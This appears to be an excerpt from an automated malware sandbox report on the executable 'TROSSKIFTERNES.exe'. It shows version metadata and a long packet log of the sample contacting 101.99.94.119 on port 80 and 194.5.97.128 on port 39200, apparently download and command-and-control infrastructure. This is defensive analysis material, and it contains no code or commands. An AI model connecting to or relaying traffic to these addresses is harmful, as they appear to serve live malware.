                              Translation | 0x0404 0x04b0
                              ProductVersion | 1.00
                              InternalName | TROSSKIFTERNES
                              FileVersion | 1.00
                              OriginalFilename | TROSSKIFTERNES.exe
                              ProductName | COUNTERPART

                              Possible Origin

                              Language of compilation system | Country where language is spoken
                              Chinese | Taiwan

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Aug 2, 2021 15:03:10.350841045 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350857019 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350878954 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350903988 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350922108 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350943089 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.351134062 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.409254074 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409315109 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409352064 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409425020 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409436941 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.409482002 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409538031 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409607887 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409661055 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.409670115 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.409698009 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409953117 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409993887 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.410032034 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.410891056 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.410927057 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.412682056 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.412710905 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.412714005 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.415751934 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.415795088 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.415849924 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416166067 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416193962 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416219950 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416243076 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416268110 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416290998 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416313887 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416337967 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416359901 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416388035 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416413069 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416434050 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416459084 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416481972 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416503906 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416527033 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416549921 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416578054 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416654110 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416676998 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416701078 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416723967 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416765928 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416789055 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416815996 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416838884 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416862011 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416884899 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416907072 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416929960 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416954041 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416975975 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.417006969 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.417032957 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.417215109 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417233944 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417237997 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417241096 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417243958 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417246103 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417249918 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417253017 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417256117 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417258024 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417260885 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417263031 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417265892 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417268038 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417270899 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417273045 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417275906 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417278051 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417280912 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.482404947 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482423067 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482441902 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482460022 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482477903 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482495070 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482511997 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482531071 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482547998 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482564926 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482582092 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482599974 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482616901 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482635021 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482652903 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482670069 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482687950 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482892990 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482929945 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482955933 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482974052 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.483016968 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.483042002 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.483066082 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.483082056 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.483181000 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.483211994 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.483299971 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.483306885 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.483309984 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.486283064 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.486361027 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.486591101 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487206936 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487282991 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487442017 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487569094 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487658978 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487705946 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487771034 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487819910 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487862110 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487977028 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.488636017 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488656044 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488658905 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488662004 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488665104 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488668919 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488672018 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488675117 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488677979 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488681078 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488684893 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488972902 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489002943 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489023924 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489043951 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489063978 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489073992 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.489084959 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489101887 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.489108086 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489130020 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489134073 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.489150047 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489160061 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.489173889 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489192963 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489198923 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.489207983 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489224911 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489281893 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.541975021 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543138981 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543164968 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543185949 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543185949 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543203115 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543226004 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543225050 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543246984 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543248892 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543268919 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543292046 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543299913 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543313026 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543328047 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543338060 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543360949 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543365002 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543380976 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543401957 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543423891 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543445110 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543468952 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543469906 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543474913 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543478012 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543488979 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543514967 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543518066 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543539047 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543543100 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543562889 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543581963 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543587923 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544773102 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.544789076 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.544806004 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544831038 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544853926 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544878006 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544904947 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544929981 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544951916 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544975042 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544997931 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545022011 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545044899 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545068026 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545092106 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545115948 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545136929 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545149088 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545159101 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545182943 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545211077 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545234919 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545236111 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545270920 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545274019 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545296907 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545303106 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545320988 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545344114 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545344114 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545370102 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545384884 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545392990 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545416117 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545427084 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545439959 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545461893 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545463085 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545521021 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545542955 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.596812010 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.596843004 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.596867085 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.596892118 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.596915007 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.596939087 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.596961021 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597059011 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597083092 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597105980 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597130060 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597140074 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597153902 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597177029 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597198963 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597248077 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597268105 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597290039 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597311974 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597331047 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597353935 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597371101 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597394943 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597415924 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597435951 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597455025 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597474098 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597498894 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597498894 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597520113 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597539902 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597559929 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597579956 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597599983 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597624063 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597632885 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597647905 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597670078 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597692966 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597716093 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597738028 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597754002 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597760916 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597784042 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597810984 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597834110 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597856045 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597872972 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597878933 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597902060 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597924948 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597970009 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597970963 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597991943 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.598017931 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.598042011 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.598063946 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.598104000 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.598210096 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:12.054330111 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.054351091 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.054366112 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.054464102 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.054503918 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.054573059 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.054622889 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.054644108 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.054661989 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.054737091 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.054747105 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.054821968 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.054883957 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055187941 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055206060 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055252075 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055254936 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.055263996 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.055299997 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055368900 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.055445910 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055533886 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055653095 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.055777073 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055850983 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055911064 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056020975 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056039095 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056087971 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056092024 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056092978 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056178093 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056257010 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056329966 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056333065 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056337118 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056364059 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056417942 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056498051 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056550026 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056554079 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056561947 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056598902 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056643009 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056735992 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056797981 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056804895 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056813002 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056899071 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056934118 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057015896 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057081938 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057086945 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057090044 CEST3920049736194.5.97.128192.168.2.3
